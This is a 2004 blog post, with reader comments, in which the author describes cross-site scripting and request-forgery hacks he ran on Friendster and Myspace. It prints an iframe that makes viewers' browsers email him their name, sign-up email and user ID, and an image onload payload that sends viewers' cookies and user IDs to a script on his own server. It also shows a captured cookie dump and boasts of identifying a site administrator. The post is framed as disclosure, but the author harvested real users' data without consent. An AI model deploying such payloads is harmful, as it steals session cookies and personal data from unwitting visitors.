05.02.04

Hacking Friendster, Part I

EDITOR'S NOTE: I have posted these hacks in the hopes of publicizing security holes and forcing the networks to close them. Please do not send me email, myspace messages, or friendster messages asking me to spend my free time helping you duplicate this hack. Both Myspace and Friendster have modified their sites enough so that these hacks no longer work. In addition, this article contained far more than enough information to duplicate these hacks (when they worked), and still contains enough information to build similar hacks today. If you do not understand how to make similar hacks, consider doing your own research. If you want my help learning CGI and DHTML/JavaScript, I am available as an independent contractor and instructor at the rate of $60/hr. If you contact me asking for assistance in stealing other people's personal information I will forward your email to the relevant social network's abuse contact person, and recommend that they deactivate your account.

This is the first in a series of articles that expose security flaws in social networks. The two hacks described here are cross-site scripting attacks.

My Friendster profile has a link to my homepage. And my homepage has an embedded iframe in it, which uses a get string to call the "Forward this profile to another user" function of friendster.

In other words, by loading my webpage, your browser loads a page which sends an email to me, via the Friendster service. This email contains: your first & last name, the email you used to sign up to Friendster, your Friendster user-id, and a link which I can use to sign up to Friendster and automatically become your friend. There is no record of this anywhere on your Friendster account; it is totally invisible.

Here's the code in my homepage:

<iframe src="http://www.friendster.com/forward?id=229243&email=MYEMAIL&subject=friendsterview&message=friendsterview" width="1" height="1">

Here's a sample of what gets sent in email:

Matt Chisholm has forwarded a user's profile to you from Matt's
personal network on Friendster.

Matt is 27 in San Francisco, CA.

If you are a Friendster member, you can view Matt's profile by
clicking below:
http://www.friendster.com/user.jsp?id=229243

If you are not a Friendster member yet, you can join Friendster by
clicking below:
http://www.friendster.com/join.jsp?inviteuser=229243

Friendster is an online community that connects people through networks
of friends for dating or making new friends.

Once you join Friendster, you will be automatically connected to your
friend Matt, and all of Matt's friends.

Friendster is inadvertently impervious to this attack, however, since you are often logged out within moments of logging in, and when you do successfully stay logged in, the site is either too slow or by that point my profile is no longer in your "Personal Network."

The security holes on Myspace, while they have gotten better, are much deeper. For a long time, they allowed free HTML entry in all fields, and they still allow some HTML entry.

For a long time, you could embed an image in your Myspace profile which called another Myspace function, so you effectively could cause a user viewing your profile (or anything with text that you created) to execute any Myspace function with your own parameters.

In these heady days of Myspace hackability, Jonathan & I created some interesting myspace hacks, which he will describe in a later post.

At some point, someone at Myspace wised up, and stopped allowing http GET requests, and then they blacklisted the <iframe> and <script> tags, added javascript to their pages to prevent them being loaded in frames, and at at least one point, someone removed a hack from my profile. (Plus for some reason they don't allow # characters in text.)

Myspace hasn't completely closed off their security holes, however. The numerous javascript event handlers are still allowed, and so are image tags, so you can embed a 1x1 image, and execute arbitrary javascript on image load.

My javascript of choice attempts to log who is viewing my profile, by sending the content of the launchIC function, which contains the viewer's UID, and all of their browser cookies, to php on my site which mails it to me.

<img src="images/new_logo_test11.gif" width="10" id="h44" height="10" onload="document.getElementById('h44').src= 'http://www.theory.org/~matt/myspace.php?u='+ escape(document.cookie)+launchIC;">

The email I get looks like this (you can see my userid down there being assigned to memberID, and the cookie content varies greatly depending on what the user has been doing):

myspace view from
IMREQUESTCHECK={ts '2004-02-05 00:43:03'}
MYUSERINFO=M)NOMP_;R2P6%P]>35)6OF/N$5%:C4MIYK,N7@Y'!2\N
6R ??S\/&1/[**0K:R_DIS10DSZOKX@ !
function launchIC(destinationMemberID) {    memberID = \"104189\"
   PrivoxyWindowOpen(\"index.cfm?fuseaction=messanger

As before, there is no record anywhere that the user can see.

And now for the question on everyone's mind. What is the upshot of all of this hacking? Who's viewing my profiles and checking out my webpage? The answers are actually quite depressing. The Friendster hack catches my friends more often than anyone else. And the people who view my Myspace profile fall into two categories: gay guys in San Francisco, and eighteen year-olds in the suburbs. I've even mailed girls on Myspace who have responded apparently without looking at my profile at all.

I leave the ramifications of this kind of insecurity in the hands of a malicious user as an exercise to the reader.

Update 10-02-2004: I should think it's obvious from this article that if you load up either url and are logged in to myspace or friendster, I will get an email with your userid.This is how I know that the ubiquitous myspace admin, Tom (userid #6221) just viewed my profile at about 8:50 pm PST tonight. I can only assume (since absolutely no one has viewed my profile there for months prior to posting this article) that this viewing event was in response to reading this article. Yay for him! I could tell you what zip code he lives in and what parameters he's been using to browse the myspace network, but I'm a nice guy and I won't. Hopefully myspace will close up their free-html security holes and not delete my account for what I'm sure is a TOS violation under some interpretations.

Update 15-02-2004: Some people have asserted that posting this kind of information on my blog is "not cool." These vulnerabilities in free HTML entry are well known, well documented vulnerabilities. I haven't discovered a new thing here; any nimrod with a DHTML manual can do this. If you run a website where people can enter free HTML, you should protect yourself and your users from these vulnerabilities. With a little bit of effort, a social engineering virus like MYDOOM could be spreading on Myspace, bringing the myspace servers to their knees and frustrating users into quitting the service.

If you are interested, I am part of a consulting company which will do security consulting for sites like these.

Update II: 15-02-2004: Some enterprising Myspace denizens have been copying and pasting my Myspace hack into their profiles. If you do this, the hack will just mail all of the information it collects to me; you will gain nothing, and it clutters up my inbox. If you want to duplicate this hack you'll have to set up a mailing script on your own site.

Update III: 26-02-2004: Jonathan has posted Hacking Social Networks Part II: Don't search private data Check back for the third installment soon. Posted by matt at 05.02.04 01:20

Comments

Only Friendster is abysimally slow, so as not to provide any actual interesting interaction.

Posted by: voidref at 07.02.04 00:06

Orkut has similar issues, since a lot of stuff (like adding communites and friends) is done via simple GET requests (although others are wrapped in serious amounts of javascript).

Posted by: James at 07.02.04 11:16

So ... couldn't you just do this by parsing the Apache referrer logs? Why bother "hacking" Friendster?

Arbitrary HTML on the other hand ... ugh. How hard could it be to put some dicey VBScript in there?

Posted by: Joe Grossberg at 09.02.04 15:14